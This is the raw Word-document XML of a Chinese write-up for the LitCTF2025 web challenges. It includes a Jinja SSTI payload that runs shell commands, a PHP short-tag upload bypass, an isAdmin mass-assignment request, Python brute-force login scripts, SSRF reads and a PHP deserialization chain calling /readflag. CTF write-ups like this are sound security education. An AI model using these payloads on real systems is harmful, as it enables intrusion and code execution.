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69.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId81.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId66.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId26.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId72.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId20.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId37.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId54.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId75.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId33.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId30.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId60.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId41.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId44.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId57.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId23.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId63.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId5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6c54d1d4752090c7dd202c3a46163246b2aab00"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">LitCTF2025（公开赛道）（web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日期：2025-08-30</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 18:19:31</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="29" w:name="X710d658a31adfca74fb27aa0577d1ed63a51971"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">easy_file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">首先是登入界面爆破发现账户密码是base64后的admin和password，进入界面</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">看源码也能看到是对其经过处理的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="169335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ets/7b6a140b-d641-4c8b-82db-922722fbb1c1-1024x329-20260331204447-q2ofo7b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9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来到上传界面上传，经过测试是过滤了&lt;?php,换成短标签&lt;?就可以</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="288230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ssets/ca9f80e1-cd95-4dd2-91a7-345e9c5db6e4-1024x560-20260331204447-oih8d7h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82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上传成功，然后就有一个很抽象的点，admin.php下是可以进行file参数任意文件读取的（卡这半天，后面学长出了）后面就是大家都会的步骤了</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="205878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ssets/3a617127-6473-44eb-b07d-9cef8c6b51b1-1024x400-20260331204447-glgzs8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58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X54472b80894bbffbde24297ae0a70f503ca4dfc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">星愿信箱</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">需要包含文字，过滤了{{吧，我们用{%绕过了，没有回显我们就加print这样</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="324259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ssets/b001abb5-197f-4715-a593-f3bcfcafda6a-1024x630-20260331204447-wophb3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42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然后用的是</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;code&gt;{%print(lipsum.&lt;strong&gt;globals&lt;/strong&gt;.&lt;strong&gt;builtins&lt;/strong&gt;.&lt;strong&gt;import&lt;/strong&gt;('os').popen('ls /</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">').read())%}&lt;/code&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="369552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ssets/9586dfed-f910-48e5-bc1b-61f5275bb79a-1024x718-20260331204447-bfd5sic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9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Xf18772c7b12c7ac1ede07774322bb0ee20f4eb2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nest_js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="251686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assets/7d4a8fe9-9d98-4ec0-b1e1-fb7b3410f08f-1024x489-20260331204447-0viz76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6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账户密码admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">passwor登入即送flag</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="47" w:name="X2311664c771ab0c9e93c322ce328b558ccb1783"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">多重宇宙日记</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">先随便创造个用户登入进去进入这个界面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="343817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assets/c1fdcbae-6d61-493c-8b14-deb7a2fde108-1-1024x668-20260331204447-adwsnh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38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我们看他的源码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// 更新表单的JS提交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'profileUpdateForm'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currentSettingsEl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'currentSettings'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statusEl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'正在更新...'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 settings 对象，只包含有值的字段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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)) settingsPayload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)) settingsPayload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...可以添加其他字段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'/api/profile/update'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settingsPayload }) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// 包装在 "settings"键下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statusEl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currentSettingsEl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刷新页面以更新导航栏（如果isAdmin状态改变）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statusEl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'错误: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    statusEl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说明了需要让isAdmin=ture,我们发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{ "settings": { "isAdmin": true } }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获得管理员面板</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="251686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assets/c703c2de-b45a-42ea-8c1c-0f578604ab6d-1024x489-20260331204447-ld3oyk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6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78" w:name="X4f4e7a305a7b860132ec44dcce9861ce431402a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">easy_signin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">界面是404，我们直接开扫</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="301791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assets/fbe7b77d-950b-4446-8aa4-0ab29dacb5aa-1-20260331204447-kye8gh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17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分别是</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="145144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assets/e1b29909-7ce5-4faa-8f12-036375cc0349-1024x282-20260331204447-ok86ldh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270500" cy="318597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assets/7d6c4692-b12f-49f9-b936-ea5564d6cfec-1024x619-20260331204447-0ut1rd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8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源码有个api.js看看</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="217572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assets/ca58244c-32bb-4261-b147-32c688e191d7-20260331204447-705tjq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75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看见url第一反应就是127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="182202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assets/c1a3b900-4266-4e29-9179-20e027fefdd7-1024x354-20260331204447-8ptftba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22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然后就卡住了，我们回到之前的登入界面看看他的逻辑，他给了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'errorTip'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loginBtn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rawPassword) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                errorTip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'请输入密码'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errorTip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passwordInput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md5Username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(rawUsername)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md5Password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(rawPassword)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shortMd5User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md5Username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shortMd5Pass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md5Password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//五分钟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'easy_signin'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(shortMd5User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shortMd5Pass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secretKey)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'X-Sign'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md5Username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md5Password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'登录成功！'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'dashboard.php'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errorTip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errorTip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passwordInput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passwordInput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errorTip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    errorTip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'网络请求失败'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errorTip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errorTip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passwordInput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errorTip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通过这个我们可以知道他的密码的生成逻辑，直接叫ai搓一个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配置参数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假设用户名已知，如果不同请修改</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">password_file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密码字典文件路径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登录URL，请替换为实际URL</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 计算用户名的MD5（固定值）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">md5_user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hashlib.md5(username.encode()).hexdigest()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 读取密码字典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(password_file,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passwords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f.readlines()]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f"密码文件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未找到"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遍历密码字典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password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passwords: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计算密码的MD5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    md5_pass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hashlib.md5(password.encode()).hexdigest()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    short_user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md5_user[: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short_pass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md5_pass[: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当前毫秒时间戳</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    sign_str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short_user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short_pass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'easy_signin'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    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hashlib.md5(sign_str.encode()).hexdigest()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构造请求头和数据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'application/x-www-form-urlencoded'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'X-Sign'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: sign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md5_user,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md5_pass,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发送POST请求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检查响应状态码和内容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假设成功响应中包含"success"关键字，根据实际响应调整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response.text.lower():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找到密码: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尝试密码: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失败，响应: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尝试密码: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失败，状态码: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请求异常 for password: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可选：添加延迟避免请求过快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time.sleep(0.1)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"爆破完成"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爆破出来是密码是admin123，依旧是让ai搓个登入后访问/dashboard.php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配置参数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假设用户名为 'admin'，如果不是请修改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'admin123'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已知的正确密码</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">login_url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'http://node6.anna.nssctf.cn:20560/login.php'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请替换为实际的登录URL</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">dashboard_url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'http://node6.anna.nssctf.cn:20560/dashboard.php'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请替换为实际的dashboard URL</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 创建一个会话对象来保持cookies</w:t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requests.Session()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 计算用户名的MD5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">md5_user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hashlib.md5(username.encode()).hexdigest()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f"用户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的MD5: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md5_user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计算密码的MD5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">md5_pass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hashlib.md5(password.encode()).hexdigest()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f"密码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的MD5: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md5_pass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截取前6位</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">short_user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md5_user[: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short_pass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md5_pass[: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f"用户名MD5前6位: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f"密码MD5前6位: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short_pass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生成时间戳（毫秒）</w:t>
      </w:r>
      <w:r>
        <w:br/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f"时间戳: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计算签名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'easy_signin'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sign_str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short_user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short_pass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secret_key</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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hashlib.md5(sign_str.encode()).hexdigest()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f"签名字符串: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f"签名MD5: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构造登录请求头和数据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'application/x-www-form-urlencoded'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'X-Sign'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: sign,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'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'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md5_user,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md5_pass,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"发送登录请求..."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发送登录POST请求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login_response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session.post(login_url,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f"登录请求URL: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login_url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f"请求方法: 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登录请求头:"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登录请求体:"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f"登录响应状态码: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login_response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f"登录响应时间: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login_response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total_seconds()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秒"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登录响应头:"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login_response.headers.items():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登录响应内容:"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尝试解析JSON响应，如果不是JSON则直接显示文本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json_response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login_response.json()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(json.dumps(json_response,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(login_response.text)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当前会话Cookies:"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cookie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session.cookies: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cookie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cookie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login_response.status_code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登录请求发送成功!"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这里可以根据实际响应内容判断是否登录成功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login_response.text.lower()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'登录成功'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login_response.text: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登录成功!"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"[-] 登录可能失败，请检查响应内容"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登录请求失败，状态码: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login_response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登录请求异常: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f"异常详情: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访问 dashboard.php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"访问 Dashboard..."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dashboard_response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session.get(dashboard_url)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f"Dashboard请求URL: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dashboard_url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f"请求方法: GET"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Dashboard请求头:"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显示发送到dashboard的请求头</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    dashboard_headers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: headers[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dashboard_headers.items():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f"Dashboard响应状态码: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dashboard_response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f"Dashboard响应时间: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dashboard_response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total_seconds()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秒"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Dashboard响应头:"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dashboard_response.headers.items():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Dashboard响应内容:"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尝试解析JSON响应，如果不是JSON则直接显示文本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json_response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dashboard_response.json()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(json.dumps(json_response,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如果是HTML，只显示前1000字符，避免控制台输出过多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dashboard_response.text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(content[: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[内容过长，已截断]"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dashboard_response.status_code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Dashboard访问成功!"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Dashboard访问失败，状态码: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dashboard_response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Dashboard请求异常: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f"异常详情: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gure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="3453618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assets/cb89fdd7-d01a-4b76-8c09-4f1b03f45902-1024x671-20260331204447-0fohoua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53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我们利用那个url参数打ssrf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="373155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ssets/35ffd8bc-3253-4a40-b073-acb699bbdee9-1024x725-20260331204447-6kz36n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31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这里可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ls /var/www/html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">来找需要用二次编码（应该是快照和网页的两次解码），我们发现了327a6c4304ad5938eaf0efb6cc3e53dc.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="1888938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assets/031ac344-30c3-40ff-ad47-48c1210e15e7-1024x367-20260331204447-wyaeuxv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8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访问得flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="1436927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assets/67c5ba93-4a55-464a-87d6-6eee02a833c5-20260331204447-04ee2w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36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还有一种方法说url参数那是能用php://(php大小写混用绕过即可)或者file://来读取源码或者urlcode.php的内容（没有去特意去看了)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="33661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assets/9474fe10-1c68-4fb2-8f09-d6466d0af787-1-1024x654-20260331204447-9zze0bc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66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4" w:name="Xa7234e474de15f0f5f8a3098ac20c9f224944b6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">君の名は</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参考自</w:t>
      </w:r>
      <w:hyperlink r:id="rId79">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.cnblogs.com/Litsasuk/articles/18896993</w:t>
        </w:r>
      </w:hyperlink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ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">create_function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'die(`/readflag`);'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Taki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$musubi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$magic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__unserialize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-&gt;musubi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'musubi'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'magic'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-&gt;musubi)()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$func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$args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](</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$args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]))-&gt;{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-&gt;magic}()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Mitsuha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$memory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$thread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__invoke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-&gt;memory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BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">thread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KatawareDoki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$kuchikamizake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-&gt;soul)-&gt;flag(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-&gt;kuchikamizake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-&gt;name)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error!no flag!"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$Litctf2025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'Litctf2025'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"/^[Oa]:[\d]+/i"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$Litctf2025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$Litctf2025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"把O改成C不就行了吗,笨蛋!～(∠・ω&lt; )⌒☆"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我们的主要目的应该就是create_function("",</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 'die(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/readflag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">);');，create_function()是用来创建匿名函数的，看到把O改成C很容易想到原生类</w:t>
      </w:r>
      <w:hyperlink r:id="rId80">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t xml:space="preserve">https://chenxi9981.github.io/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/#%E5%8E%9F%E7%94%9F%E7%B1%BB%E7%9B%B8%E5%85%B3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ArrayObject::unserialize</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ArrayIterator::unserialize</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RecursiveArrayIterator::unserialize</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SplDoublyLinkedList::unserialize</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SplQueue::unserialize</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SplStack::unserialize</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SplObjectStorage::unserialize</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">那思路应该就是利用原生类来调用匿名函数，找到ReflectionFunction的invoke方法可以调用函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5270500" cy="2455105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assets/1a25d29d-ff87-4313-bee2-9ff122f6f997-1024x477-20260331204447-bkjxycq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55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但是匿名函数怎么弄呢，可以直接用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$a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create_function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'die(`/readflag`);'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var_dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(  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#string(9) "\000lambda_1"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">\000lambda_1这个就是名字了，但是匿名函数的函数名是会改变的，在web页面中打开php文件，每刷新一次函数名的数字就会加一，最好是重新开一下环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Litsasuk师傅的exp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Taki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$musubi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$magic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"invoke"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Mitsuha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$memory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$thread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KatawareDoki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$kuchikamizake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"ReflectionFunction"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\000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">lambda_1"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Taki()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Mitsuha()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KatawareDoki()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-&gt;musubi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1.把对象当成函数调用，触发__invoke()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-&gt;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2. 把对象作为字符串使用，触发__toString()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt;soul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3. 调用不存在的方法，触发__call()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$arr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"evil"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ArrayObject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urlencode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还有一个非预期，直接在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">return ($this-&gt;musubi)();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处调用匿名函数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Taki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$musubi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\000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">lambda_1"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$magic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Taki()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$arr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"evil"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ArrayObject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urlencode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bookmarkEnd w:id="84"/>
    <w:bookmarkStart w:id="86" w:name="Xc18abaab1d7de6774c65308a187a728bebe7520"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20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拖那么久才想起来复现，easy_signineasy_signin比赛时候没出来有点可惜，这题反序列化的话其实现在还是有点迷迷糊糊（本来基础不扎实），加油吧！</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方wp</w:t>
      </w:r>
      <w:hyperlink r:id="rId85">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t xml:space="preserve">https://godyu.com/13917.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="86"/>
    <w:bookmarkEnd w:id="87"/>
    <w:sectPr w:rsidR="00E1645B" w:rsidRPr="00636E63" w:rsidSect="00C47116">
      <w:footerReference r:id="rId9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2C12F872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276A81A2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36E63"/>
    <w:rsid w:val="006747B6"/>
    <w:rsid w:val="00683C59"/>
    <w:rsid w:val="006B564A"/>
    <w:rsid w:val="0075283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5504A"/>
